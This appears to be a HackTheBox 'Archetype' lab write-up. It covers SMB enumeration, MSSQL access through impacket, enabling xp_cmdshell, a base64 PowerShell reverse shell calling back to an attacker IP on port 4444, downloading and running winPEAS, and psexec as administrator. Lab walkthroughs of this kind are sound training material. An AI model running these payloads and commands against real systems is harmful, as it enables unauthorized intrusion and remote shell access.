Archetype

Task 1

Which TCP port is hosting a database server?

Found via a regular portscan:

$ nmap -sV <ip>

Task 2

What is the name of the non-Administrative share available over SMB?

Found via enumerating using null credentials/guest user:

$ smbclient --no-pass -L //<ip>

Task 3

What is the password identified in the file on the SMB share?

First, we connect to the share, then list files and fetch the file found on the share, which contain the password:

$ smbclient --no-pass //<ip>/<share>
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Mon Jan 20 13:20:57 2020
  ..                                  D        0  Mon Jan 20 13:20:57 2020
  prod.dtsConfig                     AR      609  Mon Jan 20 13:23:02 2020

                5056511 blocks of size 4096. 2572728 blocks available
smb: \> get prod.dtsConfig
getting file \prod.dtsConfig of size 609 as prod.dtsConfig (2.9 KiloBytes/sec) (average 2.9 KiloBytes/sec)
smb: \> exit

Task 4

What script from Impacket collection can be used in order to establish an authenticated connection to a Microsoft SQL Server?

This is mssqlclient.py , which we can use to connect to the initially found SQL service:

$ impacket-mssqlclient -windows-auth <domain>/<user>@<ip>

Task 5

What extended stored procedure of Microsoft SQL Server can be used in order to spawn a Windows command shell?

This is xp_cmdshell, however, for it to be available, advanced options must be turned on first:

SQL (<domain>\<user>  dbo@master)> xp_cmdshell "net user";
ERROR(<domain>): Line 1: SQL Server blocked access to procedure 'sys.xp_cmdshell' of component 'xp_cmdshell' because this component is turned off as part of the security configuration for this server. A system administrator can enable the use of 'xp_cmdshell' by using sp_configure. For more information about enabling 'xp_cmdshell', search for 'xp_cmdshell' in SQL Server Books Online.
SQL (<domain>\<user>  dbo@master)> EXEC sp_configure 'show advanced options', 1
INFO(<domain>): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (<domain>\<user>  dbo@master)> RECONFIGURE
SQL (<domain>\<user>  dbo@master)> EXEC sp_configure 'xp_cmdshell', 1
INFO(<domain>): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (<domain>\<user>  dbo@master)> RECONFIGURE

After which, we can execute commands:

SQL (<domain>\<user>  dbo@master)> EXEC xp_cmdshell 'whoami';
output              
-----------------   
<domain>\<user>

And thereby obtain a shell. First, set up a listener:

$ nc -lvnp 4444

Get your reverse shell, e.g., powershell base64 from https://revshells.com, and leverage xp_cmdshell:

SQL (<domain>\<user>  dbo@master)> EXEC xp_cmdshell 'powershell.exe -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4AMQA0ADUAIgAsADQANAA0ADQAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA';

Verify the connection on the listener:

listening on [any] 4444 ...
connect to [10.10.14.145] from (UNKNOWN) [<ip>] <port>

PS C:\Windows\system32> whoami
<domain>\<user>

Task 6

What script can be used in order to search possible paths to escalate privileges on Windows hosts?

This is winPEAS. First, I verified that I needed winPEASx64.exe by quickly running systeminfo , which yielded:

PS C:\Users\<user>\Desktop> systeminfo

...
System Type:               x64-based PC
...

I then tried to get it straight off GitHub, however, that did not seem to work. So, I downloaded it locally, and hosted a webserver in the folder in which I had it located:

$ python -m http.server

I could then fetch it from my machine to the users desktop and run it:

PS C:\Users\<user>\Desktop> wget <my ip>:8000/winPEASx64.exe -O winPEASx64.exe
PS C:\Users\<user>\Desktop> .\winPEASx64.exe

Task 7

What file contains the administrator's password?

The winPEAS output pointed to a PS history file that contained the administrator password.

Flags

User flag was found on the desktop of the service user, while the root flag was achieved using the password from the PS history file and then authenticate using impacket-psexec:

$ impacket-psexec administrator@<ip>

After which it could be found on the administrators desktop as well.

PreviousHackTheBoxNextOverTheWire

Last updated